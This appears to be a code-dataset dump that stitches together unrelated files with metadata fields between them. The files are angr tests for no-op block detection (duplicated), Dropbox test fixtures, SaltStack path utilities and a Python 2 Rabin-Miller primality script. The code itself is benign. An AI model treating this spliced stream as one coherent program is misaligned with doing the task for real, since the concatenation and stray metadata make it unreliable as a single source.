def test_arm_noop_blocks():
arch = archinfo.arch_from_id("ARMEL")
# andeq r0, r0, r0
b = b"\x00\x00\x00\x00\x00\x00\x00\x00"
p = angr.load_shellcode(b, arch, load_address=0x400000)
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
assert CFGBase._is_noop_block(arch, block) is True
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
assert CFGBase._is_noop_block(arch, block) is True
# mov r0, r0
b = b"\x00\x00\xa0\xe1"
p = angr.load_shellcode(b, arch, load_address=0x400000)
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
assert CFGBase._is_noop_block(arch, block) is True
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
assert CFGBase._is_noop_block(arch, block) is True
if __name__ == "__main__":
test_x86_noop_blocks()
test_amd64_noop_blocks()
test_arm_noop_blocks()
|
import archinfo
import angr
from angr.analyses.cfg import CFGBase
def test_x86_noop_blocks():
# nop
arch = archinfo.arch_from_id("x86")
b = b"\x90\x90\x90\x90\x90\x90\x90\x90"
p = angr.load_shellcode(b, arch, load_address=0x400000)
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
assert CFGBase._is_noop_block(arch, block) is True
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
assert CFGBase._is_noop_block(arch, block) is True
def test_amd64_noop_blocks():
# nop
arch = archinfo.arch_from_id("amd64")
b = b"\x90\x90\x90\x90\x90\x90\x90\x90"
p = angr.load_shellcode(b, arch, load_address=0x400000)
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
assert CFGBase._is_noop_block(arch, block) is True
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
assert CFGBase._is_noop_block(arch, block) is True
def test_arm_noop_blocks():
arch = archinfo.arch_from_id("ARMEL")
# andeq r0, r0, r0
b = b"\x00\x00\x00\x00\x00\x00\x00\x00"
p = angr.load_shellcode(b, arch, load_address=0x400000)
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
assert CFGBase._is_noop_block(arch, block) is True
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
assert CFGBase._is_noop_block(arch, block) is True
# mov r0, r0
b = b"\x00\x00\xa0\xe1"
p = angr.load_shellcode(b, arch, load_address=0x400000)
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
assert CFGBase._is_noop_block(arch, block) is True
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
assert CFGBase._is_noop_block(arch, block) is True
if __name__ == "__main__":
test_x86_noop_blocks()
test_amd64_noop_blocks()
test_arm_noop_blocks()
|
bn
| 0.127037
|
# nop # nop # andeq r0, r0, r0 # mov r0, r0
| 2.138833
| 2
|
qwe.py
|
csjlxy888/test10086
| 0
|
6627591
|
<reponame>csjlxy888/test10086<gh_stars>0
num =10086
|
num =10086
|
none
| 1
| 1.072404
| 1
|
|
tests/providers/dropbox/fixtures.py
|
KakeruMizuno/RDM-waterbutler
| 0
|
6627592
|
<filename>tests/providers/dropbox/fixtures.py
import io
import os
import json
import pytest
from waterbutler.core import streams
from waterbutler.providers.dropbox import DropboxProvider
@pytest.fixture
def auth():
return {'name': 'cat', 'email': '<EMAIL>'}
@pytest.fixture
def credentials():
return {'token': '<PASSWORD>'}
@pytest.fixture
def other_credentials():
return {'token': '<PASSWORD>'}
@pytest.fixture
def settings():
return {'folder': '/Photos'}
@pytest.fixture
def settings_root():
return {'folder': '/'}
@pytest.fixture
def provider_fixtures():
# fixtures for testing validate_v1_path for root provider
with open(os.path.join(os.path.dirname(__file__), 'fixtures/root_provider.json'), 'r') as fp:
return json.load(fp)
@pytest.fixture
def revision_fixtures():
with open(os.path.join(os.path.dirname(__file__), 'fixtures/revisions.json'), 'r') as fp:
return json.load(fp)
@pytest.fixture
def error_fixtures():
with open(os.path.join(os.path.dirname(__file__), 'fixtures/errors.json'), 'r') as fp:
return json.load(fp)
@pytest.fixture
def file_content():
return b'SLEEP IS FOR THE WEAK GO SERVE STREAMS'
@pytest.fixture
def file_like(file_content):
return io.BytesIO(file_content)
@pytest.fixture
def file_stream(file_like):
return streams.FileStreamReader(file_like)
@pytest.fixture
def provider(auth, credentials, settings):
return DropboxProvider(auth, credentials, settings)
@pytest.fixture
def other_provider(auth, other_credentials, settings):
return DropboxProvider(auth, other_credentials, settings)
@pytest.fixture
def provider_root(auth, credentials, settings_root):
return DropboxProvider(auth, credentials, settings_root)
|
<filename>tests/providers/dropbox/fixtures.py
import io
import os
import json
import pytest
from waterbutler.core import streams
from waterbutler.providers.dropbox import DropboxProvider
@pytest.fixture
def auth():
return {'name': 'cat', 'email': '<EMAIL>'}
@pytest.fixture
def credentials():
return {'token': '<PASSWORD>'}
@pytest.fixture
def other_credentials():
return {'token': '<PASSWORD>'}
@pytest.fixture
def settings():
return {'folder': '/Photos'}
@pytest.fixture
def settings_root():
return {'folder': '/'}
@pytest.fixture
def provider_fixtures():
# fixtures for testing validate_v1_path for root provider
with open(os.path.join(os.path.dirname(__file__), 'fixtures/root_provider.json'), 'r') as fp:
return json.load(fp)
@pytest.fixture
def revision_fixtures():
with open(os.path.join(os.path.dirname(__file__), 'fixtures/revisions.json'), 'r') as fp:
return json.load(fp)
@pytest.fixture
def error_fixtures():
with open(os.path.join(os.path.dirname(__file__), 'fixtures/errors.json'), 'r') as fp:
return json.load(fp)
@pytest.fixture
def file_content():
return b'SLEEP IS FOR THE WEAK GO SERVE STREAMS'
@pytest.fixture
def file_like(file_content):
return io.BytesIO(file_content)
@pytest.fixture
def file_stream(file_like):
return streams.FileStreamReader(file_like)
@pytest.fixture
def provider(auth, credentials, settings):
return DropboxProvider(auth, credentials, settings)
@pytest.fixture
def other_provider(auth, other_credentials, settings):
return DropboxProvider(auth, other_credentials, settings)
@pytest.fixture
def provider_root(auth, credentials, settings_root):
return DropboxProvider(auth, credentials, settings_root)
|
en
| 0.584845
|
# fixtures for testing validate_v1_path for root provider
| 2.090881
| 2
|
salt/utils/path.py
|
veym4os/salt
| 0
|
6627593
|
<reponame>veym4os/salt
# -*- coding: utf-8 -*-
'''
Platform independent versions of some os/os.path functions. Gets around PY2's
lack of support for reading NTFS links.
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import errno
import logging
import os
import posixpath
import re
import string
import struct
# Import Salt libs
import salt.utils.args
import salt.utils.platform
import salt.utils.stringutils
from salt.exceptions import CommandNotFoundError
from salt.utils.decorators import memoize as real_memoize
from salt.utils.decorators.jinja import jinja_filter
# Import 3rd-party libs
from salt.ext import six
try:
import win32file
from pywintypes import error as pywinerror
HAS_WIN32FILE = True
except ImportError:
HAS_WIN32FILE = False
log = logging.getLogger(__name__)
def islink(path):
'''
Equivalent to os.path.islink()
'''
if six.PY3 or not salt.utils.platform.is_windows():
return os.path.islink(path)
if not HAS_WIN32FILE:
log.error('Cannot check if %s is a link, missing required modules', path)
if not _is_reparse_point(path):
return False
# check that it is a symlink reparse point (in case it is something else,
# like a mount point)
reparse_data = _get_reparse_data(path)
# sanity check - this should not happen
if not reparse_data:
# not a reparse point
return False
# REPARSE_DATA_BUFFER structure - see
# http://msdn.microsoft.com/en-us/library/ff552012.aspx
# parse the structure header to work out which type of reparse point this is
header_parser = struct.Struct('L')
ReparseTag, = header_parser.unpack(reparse_data[:header_parser.size])
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx
if not ReparseTag & 0xA000FFFF == 0xA000000C:
return False
else:
return True
def readlink(path):
'''
Equivalent to os.readlink()
'''
if six.PY3 or not salt.utils.platform.is_windows():
return os.readlink(path)
if not HAS_WIN32FILE:
log.error('Cannot read %s, missing required modules', path)
reparse_data = _get_reparse_data(path)
if not reparse_data:
# Reproduce *NIX behavior when os.readlink is performed on a path that
# is not a symbolic link.
raise OSError(errno.EINVAL, 'Invalid argument: \'{0}\''.format(path))
# REPARSE_DATA_BUFFER structure - see
# http://msdn.microsoft.com/en-us/library/ff552012.aspx
# parse the structure header to work out which type of reparse point this is
header_parser = struct.Struct('L')
ReparseTag, = header_parser.unpack(reparse_data[:header_parser.size])
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx
if not ReparseTag & 0xA000FFFF == 0xA000000C:
raise OSError(
errno.EINVAL,
'{0} is not a symlink, but another type of reparse point '
'(0x{0:X}).'.format(ReparseTag)
)
# parse as a symlink reparse point structure (the structure for other
# reparse points is different)
data_parser = struct.Struct('LHHHHHHL')
ReparseTag, ReparseDataLength, Reserved, SubstituteNameOffset, \
SubstituteNameLength, PrintNameOffset, \
PrintNameLength, Flags = data_parser.unpack(reparse_data[:data_parser.size])
path_buffer_offset = data_parser.size
absolute_substitute_name_offset = path_buffer_offset + SubstituteNameOffset
target_bytes = reparse_data[absolute_substitute_name_offset:absolute_substitute_name_offset+SubstituteNameLength]
target = target_bytes.decode('UTF-16')
if target.startswith('\\??\\'):
target = target[4:]
try:
# comes out in 8.3 form; convert it to LFN to make it look nicer
target = win32file.GetLongPathName(target)
except pywinerror as exc:
# If target is on a UNC share, the decoded target will be in the format
# "UNC\hostanme\sharename\additional\subdirs\under\share". So, in
# these cases, return the target path in the proper UNC path format.
if target.startswith('UNC\\'):
return re.sub(r'^UNC\\+', r'\\\\', target)
# if file is not found (i.e. bad symlink), return it anyway like on *nix
if exc.winerror == 2:
return target
raise
return target
def _is_reparse_point(path):
'''
Returns True if path is a reparse point; False otherwise.
'''
result = win32file.GetFileAttributesW(path)
if result == -1:
return False
return True if result & 0x400 else False
def _get_reparse_data(path):
'''
Retrieves the reparse point data structure for the given path.
If the path is not a reparse point, None is returned.
See http://msdn.microsoft.com/en-us/library/ff552012.aspx for details on the
REPARSE_DATA_BUFFER structure returned.
'''
# ensure paths are using the right slashes
path = os.path.normpath(path)
if not _is_reparse_point(path):
return None
fileHandle = None
try:
fileHandle = win32file.CreateFileW(
path,
0x80000000, # GENERIC_READ
1, # share with other readers
None, # no inherit, default security descriptor
3, # OPEN_EXISTING
0x00200000 | 0x02000000 # FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS
)
reparseData = win32file.DeviceIoControl(
fileHandle,
0x900a8, # FSCTL_GET_REPARSE_POINT
None, # in buffer
16384 # out buffer size (MAXIMUM_REPARSE_DATA_BUFFER_SIZE)
)
finally:
if fileHandle:
win32file.CloseHandle(fileHandle)
return reparseData
@jinja_filter('which')
def which(exe=None):
'''
Python clone of /usr/bin/which
'''
def _is_executable_file_or_link(exe):
# check for os.X_OK doesn't suffice because directory may executable
return (os.access(exe, os.X_OK) and
(os.path.isfile(exe) or os.path.islink(exe)))
if exe:
if _is_executable_file_or_link(exe):
# executable in cwd or fullpath
return exe
ext_list = salt.utils.stringutils.to_str(
os.environ.get('PATHEXT', str('.EXE'))
).split(str(';'))
@real_memoize
def _exe_has_ext():
'''
Do a case insensitive test if exe has a file extension match in
PATHEXT
'''
for ext in ext_list:
try:
pattern = r'.*\.{0}$'.format(
salt.utils.stringutils.to_unicode(ext).lstrip('.')
)
re.match(
pattern,
salt.utils.stringutils.to_unicode(exe),
re.I).groups()
return True
except AttributeError:
continue
return False
# Enhance POSIX path for the reliability at some environments, when $PATH is changing
# This also keeps order, where 'first came, first win' for cases to find optional alternatives
system_path = salt.utils.stringutils.to_unicode(os.environ.get('PATH', ''))
search_path = system_path.split(os.pathsep)
if not salt.utils.platform.is_windows():
search_path.extend([
x for x in ('/bin', '/sbin', '/usr/bin',
'/usr/sbin', '/usr/local/bin')
if x not in search_path
])
for path in search_path:
full_path = join(path, exe)
if _is_executable_file_or_link(full_path):
return full_path
elif salt.utils.platform.is_windows() and not _exe_has_ext():
# On Windows, check for any extensions in PATHEXT.
# Allows both 'cmd' and 'cmd.exe' to be matched.
for ext in ext_list:
# Windows filesystem is case insensitive so we
# safely rely on that behavior
if _is_executable_file_or_link(full_path + ext):
return full_path + ext
log.trace(
'\'%s\' could not be found in the following search path: \'%s\'',
exe, search_path
)
else:
log.error('No executable was passed to be searched by salt.utils.path.which()')
return None
def which_bin(exes):
'''
Scan over some possible executables and return the first one that is found
'''
if not isinstance(exes, Iterable):
return None
for exe in exes:
path = which(exe)
if not path:
continue
return path
return None
@jinja_filter('path_join')
def join(*parts, **kwargs):
'''
This functions tries to solve some issues when joining multiple absolute
paths on both *nix and windows platforms.
See tests/unit/utils/path_join_test.py for some examples on what's being
talked about here.
The "use_posixpath" kwarg can be be used to force joining using poxixpath,
which is useful for Salt fileserver paths on Windows masters.
'''
if six.PY3:
new_parts = []
for part in parts:
new_parts.append(salt.utils.stringutils.to_str(part))
parts = new_parts
kwargs = salt.utils.args.clean_kwargs(**kwargs)
use_posixpath = kwargs.pop('use_posixpath', False)
if kwargs:
salt.utils.args.invalid_kwargs(kwargs)
pathlib = posixpath if use_posixpath else os.path
# Normalize path converting any os.sep as needed
parts = [pathlib.normpath(p) for p in parts]
try:
root = parts.pop(0)
except IndexError:
# No args passed to func
return ''
root = salt.utils.stringutils.to_unicode(root)
if not parts:
ret = root
else:
stripped = [p.lstrip(os.sep) for p in parts]
ret = pathlib.join(root, *salt.utils.data.decode(stripped))
return pathlib.normpath(ret)
def check_or_die(command):
'''
Simple convenience function for modules to use for gracefully blowing up
if a required tool is not available in the system path.
Lazily import `salt.modules.cmdmod` to avoid any sort of circular
dependencies.
'''
if command is None:
raise CommandNotFoundError('\'None\' is not a valid command.')
if not which(command):
raise CommandNotFoundError('\'{0}\' is not in the path'.format(command))
def sanitize_win_path(winpath):
'''
Remove illegal path characters for windows
'''
intab = '<>:|?*'
if isinstance(winpath, six.text_type):
winpath = winpath.translate(dict((ord(c), '_') for c in intab))
elif isinstance(winpath, six.string_types):
outtab = '_' * len(intab)
trantab = ''.maketrans(intab, outtab) if six.PY3 else string.maketrans(intab, outtab) # pylint: disable=no-member
winpath = winpath.translate(trantab)
return winpath
def safe_path(path, allow_path=None):
r'''
.. versionadded:: 2017.7.3
Checks that the path is safe for modification by Salt. For example, you
wouldn't want to have salt delete the contents of ``C:\Windows``. The
following directories are considered unsafe:
- C:\, D:\, E:\, etc.
- \
- C:\Windows
Args:
path (str): The path to check
allow_paths (str, list): A directory or list of directories inside of
path that may be safe. For example: ``C:\Windows\TEMP``
Returns:
bool: True if safe, otherwise False
'''
# Create regex definitions for directories that may be unsafe to modify
system_root = os.environ.get('SystemRoot', 'C:\\Windows')
deny_paths = (
r'[a-z]\:\\$', # C:\, D:\, etc
r'\\$', # \
re.escape(system_root) # C:\Windows
)
# Make allow_path a list
if allow_path and not isinstance(allow_path, list):
allow_path = [allow_path]
# Create regex definition for directories we may want to make exceptions for
allow_paths = list()
if allow_path:
for item in allow_path:
allow_paths.append(re.escape(item))
# Check the path to make sure it's not one of the bad paths
good_path = True
for d_path in deny_paths:
if re.match(d_path, path, flags=re.IGNORECASE) is not None:
# Found deny path
good_path = False
# If local_dest is one of the bad paths, check for exceptions
if not good_path:
for a_path in allow_paths:
if re.match(a_path, path, flags=re.IGNORECASE) is not None:
# Found exception
good_path = True
return good_path
def os_walk(top, *args, **kwargs):
'''
This is a helper than ensures that all paths returned from os.walk are
unicode.
'''
if six.PY2 and salt.utils.platform.is_windows():
top_query = top
else:
top_query = salt.utils.stringutils.to_str(top)
for item in os.walk(top_query, *args, **kwargs):
yield salt.utils.data.decode(item, preserve_tuples=True)
|
# -*- coding: utf-8 -*-
'''
Platform independent versions of some os/os.path functions. Gets around PY2's
lack of support for reading NTFS links.
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import errno
import logging
import os
import posixpath
import re
import string
import struct
# Import Salt libs
import salt.utils.args
import salt.utils.platform
import salt.utils.stringutils
from salt.exceptions import CommandNotFoundError
from salt.utils.decorators import memoize as real_memoize
from salt.utils.decorators.jinja import jinja_filter
# Import 3rd-party libs
from salt.ext import six
try:
import win32file
from pywintypes import error as pywinerror
HAS_WIN32FILE = True
except ImportError:
HAS_WIN32FILE = False
log = logging.getLogger(__name__)
def islink(path):
'''
Equivalent to os.path.islink()
'''
if six.PY3 or not salt.utils.platform.is_windows():
return os.path.islink(path)
if not HAS_WIN32FILE:
log.error('Cannot check if %s is a link, missing required modules', path)
if not _is_reparse_point(path):
return False
# check that it is a symlink reparse point (in case it is something else,
# like a mount point)
reparse_data = _get_reparse_data(path)
# sanity check - this should not happen
if not reparse_data:
# not a reparse point
return False
# REPARSE_DATA_BUFFER structure - see
# http://msdn.microsoft.com/en-us/library/ff552012.aspx
# parse the structure header to work out which type of reparse point this is
header_parser = struct.Struct('L')
ReparseTag, = header_parser.unpack(reparse_data[:header_parser.size])
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx
if not ReparseTag & 0xA000FFFF == 0xA000000C:
return False
else:
return True
def readlink(path):
'''
Equivalent to os.readlink()
'''
if six.PY3 or not salt.utils.platform.is_windows():
return os.readlink(path)
if not HAS_WIN32FILE:
log.error('Cannot read %s, missing required modules', path)
reparse_data = _get_reparse_data(path)
if not reparse_data:
# Reproduce *NIX behavior when os.readlink is performed on a path that
# is not a symbolic link.
raise OSError(errno.EINVAL, 'Invalid argument: \'{0}\''.format(path))
# REPARSE_DATA_BUFFER structure - see
# http://msdn.microsoft.com/en-us/library/ff552012.aspx
# parse the structure header to work out which type of reparse point this is
header_parser = struct.Struct('L')
ReparseTag, = header_parser.unpack(reparse_data[:header_parser.size])
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx
if not ReparseTag & 0xA000FFFF == 0xA000000C:
raise OSError(
errno.EINVAL,
'{0} is not a symlink, but another type of reparse point '
'(0x{0:X}).'.format(ReparseTag)
)
# parse as a symlink reparse point structure (the structure for other
# reparse points is different)
data_parser = struct.Struct('LHHHHHHL')
ReparseTag, ReparseDataLength, Reserved, SubstituteNameOffset, \
SubstituteNameLength, PrintNameOffset, \
PrintNameLength, Flags = data_parser.unpack(reparse_data[:data_parser.size])
path_buffer_offset = data_parser.size
absolute_substitute_name_offset = path_buffer_offset + SubstituteNameOffset
target_bytes = reparse_data[absolute_substitute_name_offset:absolute_substitute_name_offset+SubstituteNameLength]
target = target_bytes.decode('UTF-16')
if target.startswith('\\??\\'):
target = target[4:]
try:
# comes out in 8.3 form; convert it to LFN to make it look nicer
target = win32file.GetLongPathName(target)
except pywinerror as exc:
# If target is on a UNC share, the decoded target will be in the format
# "UNC\hostanme\sharename\additional\subdirs\under\share". So, in
# these cases, return the target path in the proper UNC path format.
if target.startswith('UNC\\'):
return re.sub(r'^UNC\\+', r'\\\\', target)
# if file is not found (i.e. bad symlink), return it anyway like on *nix
if exc.winerror == 2:
return target
raise
return target
def _is_reparse_point(path):
'''
Returns True if path is a reparse point; False otherwise.
'''
result = win32file.GetFileAttributesW(path)
if result == -1:
return False
return True if result & 0x400 else False
def _get_reparse_data(path):
'''
Retrieves the reparse point data structure for the given path.
If the path is not a reparse point, None is returned.
See http://msdn.microsoft.com/en-us/library/ff552012.aspx for details on the
REPARSE_DATA_BUFFER structure returned.
'''
# ensure paths are using the right slashes
path = os.path.normpath(path)
if not _is_reparse_point(path):
return None
fileHandle = None
try:
fileHandle = win32file.CreateFileW(
path,
0x80000000, # GENERIC_READ
1, # share with other readers
None, # no inherit, default security descriptor
3, # OPEN_EXISTING
0x00200000 | 0x02000000 # FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS
)
reparseData = win32file.DeviceIoControl(
fileHandle,
0x900a8, # FSCTL_GET_REPARSE_POINT
None, # in buffer
16384 # out buffer size (MAXIMUM_REPARSE_DATA_BUFFER_SIZE)
)
finally:
if fileHandle:
win32file.CloseHandle(fileHandle)
return reparseData
@jinja_filter('which')
def which(exe=None):
'''
Python clone of /usr/bin/which
'''
def _is_executable_file_or_link(exe):
# check for os.X_OK doesn't suffice because directory may executable
return (os.access(exe, os.X_OK) and
(os.path.isfile(exe) or os.path.islink(exe)))
if exe:
if _is_executable_file_or_link(exe):
# executable in cwd or fullpath
return exe
ext_list = salt.utils.stringutils.to_str(
os.environ.get('PATHEXT', str('.EXE'))
).split(str(';'))
@real_memoize
def _exe_has_ext():
'''
Do a case insensitive test if exe has a file extension match in
PATHEXT
'''
for ext in ext_list:
try:
pattern = r'.*\.{0}$'.format(
salt.utils.stringutils.to_unicode(ext).lstrip('.')
)
re.match(
pattern,
salt.utils.stringutils.to_unicode(exe),
re.I).groups()
return True
except AttributeError:
continue
return False
# Enhance POSIX path for the reliability at some environments, when $PATH is changing
# This also keeps order, where 'first came, first win' for cases to find optional alternatives
system_path = salt.utils.stringutils.to_unicode(os.environ.get('PATH', ''))
search_path = system_path.split(os.pathsep)
if not salt.utils.platform.is_windows():
search_path.extend([
x for x in ('/bin', '/sbin', '/usr/bin',
'/usr/sbin', '/usr/local/bin')
if x not in search_path
])
for path in search_path:
full_path = join(path, exe)
if _is_executable_file_or_link(full_path):
return full_path
elif salt.utils.platform.is_windows() and not _exe_has_ext():
# On Windows, check for any extensions in PATHEXT.
# Allows both 'cmd' and 'cmd.exe' to be matched.
for ext in ext_list:
# Windows filesystem is case insensitive so we
# safely rely on that behavior
if _is_executable_file_or_link(full_path + ext):
return full_path + ext
log.trace(
'\'%s\' could not be found in the following search path: \'%s\'',
exe, search_path
)
else:
log.error('No executable was passed to be searched by salt.utils.path.which()')
return None
def which_bin(exes):
'''
Scan over some possible executables and return the first one that is found
'''
if not isinstance(exes, Iterable):
return None
for exe in exes:
path = which(exe)
if not path:
continue
return path
return None
@jinja_filter('path_join')
def join(*parts, **kwargs):
'''
This functions tries to solve some issues when joining multiple absolute
paths on both *nix and windows platforms.
See tests/unit/utils/path_join_test.py for some examples on what's being
talked about here.
The "use_posixpath" kwarg can be be used to force joining using poxixpath,
which is useful for Salt fileserver paths on Windows masters.
'''
if six.PY3:
new_parts = []
for part in parts:
new_parts.append(salt.utils.stringutils.to_str(part))
parts = new_parts
kwargs = salt.utils.args.clean_kwargs(**kwargs)
use_posixpath = kwargs.pop('use_posixpath', False)
if kwargs:
salt.utils.args.invalid_kwargs(kwargs)
pathlib = posixpath if use_posixpath else os.path
# Normalize path converting any os.sep as needed
parts = [pathlib.normpath(p) for p in parts]
try:
root = parts.pop(0)
except IndexError:
# No args passed to func
return ''
root = salt.utils.stringutils.to_unicode(root)
if not parts:
ret = root
else:
stripped = [p.lstrip(os.sep) for p in parts]
ret = pathlib.join(root, *salt.utils.data.decode(stripped))
return pathlib.normpath(ret)
def check_or_die(command):
'''
Simple convenience function for modules to use for gracefully blowing up
if a required tool is not available in the system path.
Lazily import `salt.modules.cmdmod` to avoid any sort of circular
dependencies.
'''
if command is None:
raise CommandNotFoundError('\'None\' is not a valid command.')
if not which(command):
raise CommandNotFoundError('\'{0}\' is not in the path'.format(command))
def sanitize_win_path(winpath):
'''
Remove illegal path characters for windows
'''
intab = '<>:|?*'
if isinstance(winpath, six.text_type):
winpath = winpath.translate(dict((ord(c), '_') for c in intab))
elif isinstance(winpath, six.string_types):
outtab = '_' * len(intab)
trantab = ''.maketrans(intab, outtab) if six.PY3 else string.maketrans(intab, outtab) # pylint: disable=no-member
winpath = winpath.translate(trantab)
return winpath
def safe_path(path, allow_path=None):
r'''
.. versionadded:: 2017.7.3
Checks that the path is safe for modification by Salt. For example, you
wouldn't want to have salt delete the contents of ``C:\Windows``. The
following directories are considered unsafe:
- C:\, D:\, E:\, etc.
- \
- C:\Windows
Args:
path (str): The path to check
allow_paths (str, list): A directory or list of directories inside of
path that may be safe. For example: ``C:\Windows\TEMP``
Returns:
bool: True if safe, otherwise False
'''
# Create regex definitions for directories that may be unsafe to modify
system_root = os.environ.get('SystemRoot', 'C:\\Windows')
deny_paths = (
r'[a-z]\:\\$', # C:\, D:\, etc
r'\\$', # \
re.escape(system_root) # C:\Windows
)
# Make allow_path a list
if allow_path and not isinstance(allow_path, list):
allow_path = [allow_path]
# Create regex definition for directories we may want to make exceptions for
allow_paths = list()
if allow_path:
for item in allow_path:
allow_paths.append(re.escape(item))
# Check the path to make sure it's not one of the bad paths
good_path = True
for d_path in deny_paths:
if re.match(d_path, path, flags=re.IGNORECASE) is not None:
# Found deny path
good_path = False
# If local_dest is one of the bad paths, check for exceptions
if not good_path:
for a_path in allow_paths:
if re.match(a_path, path, flags=re.IGNORECASE) is not None:
# Found exception
good_path = True
return good_path
def os_walk(top, *args, **kwargs):
'''
This is a helper than ensures that all paths returned from os.walk are
unicode.
'''
if six.PY2 and salt.utils.platform.is_windows():
top_query = top
else:
top_query = salt.utils.stringutils.to_str(top)
for item in os.walk(top_query, *args, **kwargs):
yield salt.utils.data.decode(item, preserve_tuples=True)
|
en
| 0.795688
|
# -*- coding: utf-8 -*- Platform independent versions of some os/os.path functions. Gets around PY2's lack of support for reading NTFS links. # Import python libs # Import Salt libs # Import 3rd-party libs Equivalent to os.path.islink() # check that it is a symlink reparse point (in case it is something else, # like a mount point) # sanity check - this should not happen # not a reparse point # REPARSE_DATA_BUFFER structure - see # http://msdn.microsoft.com/en-us/library/ff552012.aspx # parse the structure header to work out which type of reparse point this is # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx Equivalent to os.readlink() # Reproduce *NIX behavior when os.readlink is performed on a path that # is not a symbolic link. # REPARSE_DATA_BUFFER structure - see # http://msdn.microsoft.com/en-us/library/ff552012.aspx # parse the structure header to work out which type of reparse point this is # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx # parse as a symlink reparse point structure (the structure for other # reparse points is different) # comes out in 8.3 form; convert it to LFN to make it look nicer # If target is on a UNC share, the decoded target will be in the format # "UNC\hostanme\sharename\additional\subdirs\under\share". So, in # these cases, return the target path in the proper UNC path format. # if file is not found (i.e. bad symlink), return it anyway like on *nix Returns True if path is a reparse point; False otherwise. Retrieves the reparse point data structure for the given path. If the path is not a reparse point, None is returned. See http://msdn.microsoft.com/en-us/library/ff552012.aspx for details on the REPARSE_DATA_BUFFER structure returned. # ensure paths are using the right slashes # GENERIC_READ # share with other readers # no inherit, default security descriptor # OPEN_EXISTING # FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS # FSCTL_GET_REPARSE_POINT # in buffer # out buffer size (MAXIMUM_REPARSE_DATA_BUFFER_SIZE) Python clone of /usr/bin/which # check for os.X_OK doesn't suffice because directory may executable # executable in cwd or fullpath Do a case insensitive test if exe has a file extension match in PATHEXT # Enhance POSIX path for the reliability at some environments, when $PATH is changing # This also keeps order, where 'first came, first win' for cases to find optional alternatives # On Windows, check for any extensions in PATHEXT. # Allows both 'cmd' and 'cmd.exe' to be matched. # Windows filesystem is case insensitive so we # safely rely on that behavior Scan over some possible executables and return the first one that is found This functions tries to solve some issues when joining multiple absolute paths on both *nix and windows platforms. See tests/unit/utils/path_join_test.py for some examples on what's being talked about here. The "use_posixpath" kwarg can be be used to force joining using poxixpath, which is useful for Salt fileserver paths on Windows masters. # Normalize path converting any os.sep as needed # No args passed to func Simple convenience function for modules to use for gracefully blowing up if a required tool is not available in the system path. Lazily import `salt.modules.cmdmod` to avoid any sort of circular dependencies. Remove illegal path characters for windows # pylint: disable=no-member .. versionadded:: 2017.7.3 Checks that the path is safe for modification by Salt. For example, you wouldn't want to have salt delete the contents of ``C:\Windows``. The following directories are considered unsafe: - C:\, D:\, E:\, etc. - \ - C:\Windows Args: path (str): The path to check allow_paths (str, list): A directory or list of directories inside of path that may be safe. For example: ``C:\Windows\TEMP`` Returns: bool: True if safe, otherwise False # Create regex definitions for directories that may be unsafe to modify # C:\, D:\, etc # \ # C:\Windows # Make allow_path a list # Create regex definition for directories we may want to make exceptions for # Check the path to make sure it's not one of the bad paths # Found deny path # If local_dest is one of the bad paths, check for exceptions # Found exception This is a helper than ensures that all paths returned from os.walk are unicode.
| 2.359116
| 2
|
Rabin_miller_primality_test.py
|
lokeshh/Information_security_lab
| 7
|
6627594
|
<reponame>lokeshh/Information_security_lab
import random
#Algorithm
#It returns false if n is composite and true if n is probably prime. K is an input parameter that determines accuracy level.
#Higher valur of k indicates more accuracy.
#miller test algo
def millertest(d,n):
#pick random no. in [2...n-2] and make sure its >4
a = 2 + random.randint(1,100000) % (n-4)
#Compute a^d % n
x = (a**d) % n
if(x == 1 or x == n-1):
return True
while(d != n-1):
x = (x*x) %n
d *= 2
if(x == 1):
return False
if(x == n-1):
return True
return False
#checking if prime
def isprime(n,k):
#corner cases
if(n<=1 or n==4):
return False
if(n<=3):
return True
# Find r such that n = 2^d * r + 1 for some r >= 1
d = n-1
while(d%2 == 0):
d/=2
#Iterate given no. k times
for i in range(0,k):
if(millertest(d,n) == False):
return False
#return False
return True
#main program
k = 4 #no. of iterations
print"Enter 2 numbers to find the primes in b/w"
a,b = map(int,raw_input().split())
print"Prime no.'s b/w them are :"
for n in range(a,b):
if(isprime(n,k)):
print n
|
import random
#Algorithm
#It returns false if n is composite and true if n is probably prime. K is an input parameter that determines accuracy level.
#Higher valur of k indicates more accuracy.
#miller test algo
def millertest(d,n):
#pick random no. in [2...n-2] and make sure its >4
a = 2 + random.randint(1,100000) % (n-4)
#Compute a^d % n
x = (a**d) % n
if(x == 1 or x == n-1):
return True
while(d != n-1):
x = (x*x) %n
d *= 2
if(x == 1):
return False
if(x == n-1):
return True
return False
#checking if prime
def isprime(n,k):
#corner cases
if(n<=1 or n==4):
return False
if(n<=3):
return True
# Find r such that n = 2^d * r + 1 for some r >= 1
d = n-1
while(d%2 == 0):
d/=2
#Iterate given no. k times
for i in range(0,k):
if(millertest(d,n) == False):
return False
#return False
return True
#main program
k = 4 #no. of iterations
print"Enter 2 numbers to find the primes in b/w"
